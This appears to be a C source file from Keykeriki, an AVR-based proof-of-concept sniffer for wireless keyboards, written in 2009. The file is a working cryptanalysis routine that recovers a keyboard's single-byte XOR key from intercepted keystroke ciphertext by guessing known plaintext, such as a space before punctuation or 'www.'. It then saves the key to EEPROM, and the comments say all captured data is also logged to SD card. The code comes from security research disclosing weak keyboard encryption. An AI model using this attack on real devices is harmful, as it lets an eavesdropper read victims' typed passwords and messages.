/* 
 * Keykeriki
 * 
 * $Id: crack.c 32 2009-06-07 20:11:05Z ths $
 *
 * Authors/Copyright:
 *    Thorsten Schroeder <ths  (at)  dev.io>
 *
 * Revision: $Rev: 32 $
 *
 * germany, Berlin, 2009/04/25
 *
 * */
#include <stdio.h>
#include <avr/eeprom.h>
#include <avr/pgmspace.h>

#include "crack.h"
#include "eeprom.h"
#include "trf7900.h"
#include "main.h"

/* XXX Remove this temporary HID code definition. We need a reverse lookup
 * table for the HID codes */
#define TMP_WHITESPACE_HID 0x2C
#define TMP_W_HID          0x1A
#define TMP_DOT_HID        0x37

extern uint8_t history[];
extern uint8_t key_chA;
extern uint8_t key_chB;

uint8_t punctuationmarks[] = {0x1E, 0x33, 0x37, 0x38, 0x2B };

void crack_init(void)
{
   uint8_t i=0;

   for(i=0;i<CRACK_HISTSIZE; i++)
      history[i] = 0xFF - i;
}

/* Rudimentary analysis of ciphertext... following two simple approaches 
 * for this Proof-of-Concept. There might be false positives in key detection,
 * but we accept this behaviour, since we also log everything (even the
 * untouched, encrypted data) to SD Memory card for further, deeper
 * crypt-analysis approaches. */
uint8_t crypto_analyse(uint8_t meta, uint8_t c)
{
   uint8_t i = 0;

   /* if we do not have a key and if we didn't saw any SYNC sequences, we
    * try to analyse data here. */
   
   /* put current byte into history */
   for(i=(CRACK_HISTSIZE-1);i>0;i--)
      history[i] = history[i-1];

   history[0] = c;

   /* shift metakey pressed? */
   meta &= 0x22;

   /* If the shift metakey is pressed, we assume that the previous key was a
    * whitespace and therefore we do an XOR of the previous byte with 0x2C
    * (the HIDcode for ' '. The result is used as XOR key to decrypt the byte
    * right before the previous one. If the result is a punctuation mark, we
    * can assume to have the correct key for this session. */
   if(meta) {
      uint8_t tmp =  history[2] ^ (history[1] ^ TMP_WHITESPACE_HID);

      for(i=0; i<sizeof(punctuationmarks);i++) {
         if(tmp == punctuationmarks[i]) {
            crypto_setkey(TRF_CHAN_A,( history[1] ^ TMP_WHITESPACE_HID));
            printf_P(PSTR("\r\n[+] key found ! (%02x)\r\n"), key_chA);
            return 1;
         }
      }
   } 
   
   /* 2ndly we try to identify the term "www" followed by a dot mark. This
    * might be used often when using teh intarweb. We match three equal
    * characters and XOR one of them with the HID code for character 'w'. 
    * The result is then XOR'ed with the current character. If the result is
    * the plaintext HID code for the dot character, we have (hopefully) found 
    * a key. */
   if( (history[2] == history[1] && history[3] == history[1]) ) { /* www :) */
      uint8_t tmp =  history[0] ^ (history[1] ^ TMP_W_HID);
         if(tmp == TMP_DOT_HID) {
            crypto_setkey(TRF_CHAN_A, (history[1] ^ TMP_W_HID));
            printf_P(PSTR("\r\n[+] key found ! (%02x)\r\n"), key_chA);
            return 1;
         }
   }

   return 0;
}


/* chan = mouse or keyboard channel (a or b)
 * key = 1 byte key
 * */
uint8_t crypto_setkey(uint8_t chan, uint8_t key)
{
   printf_P(PSTR("\r\n[*] setkey %02x for channel %c ... "), 
         key, (chan==TRF_CHAN_A) ? 'A' : 'B');

   switch(chan) {
      case TRF_CHAN_A:
         key_chA = key;
         eeprom_busy_wait();
         eeprom_write_byte(&ee_cfg_crypto_key_a, key);
         break;
      case TRF_CHAN_B:
          key_chB = key;
         eeprom_busy_wait();
         eeprom_write_byte(&ee_cfg_crypto_key_b, key);
         break;
      default:
         break;
   }

   printf_P(PSTR(" done\r\n"));

   return(0);
}

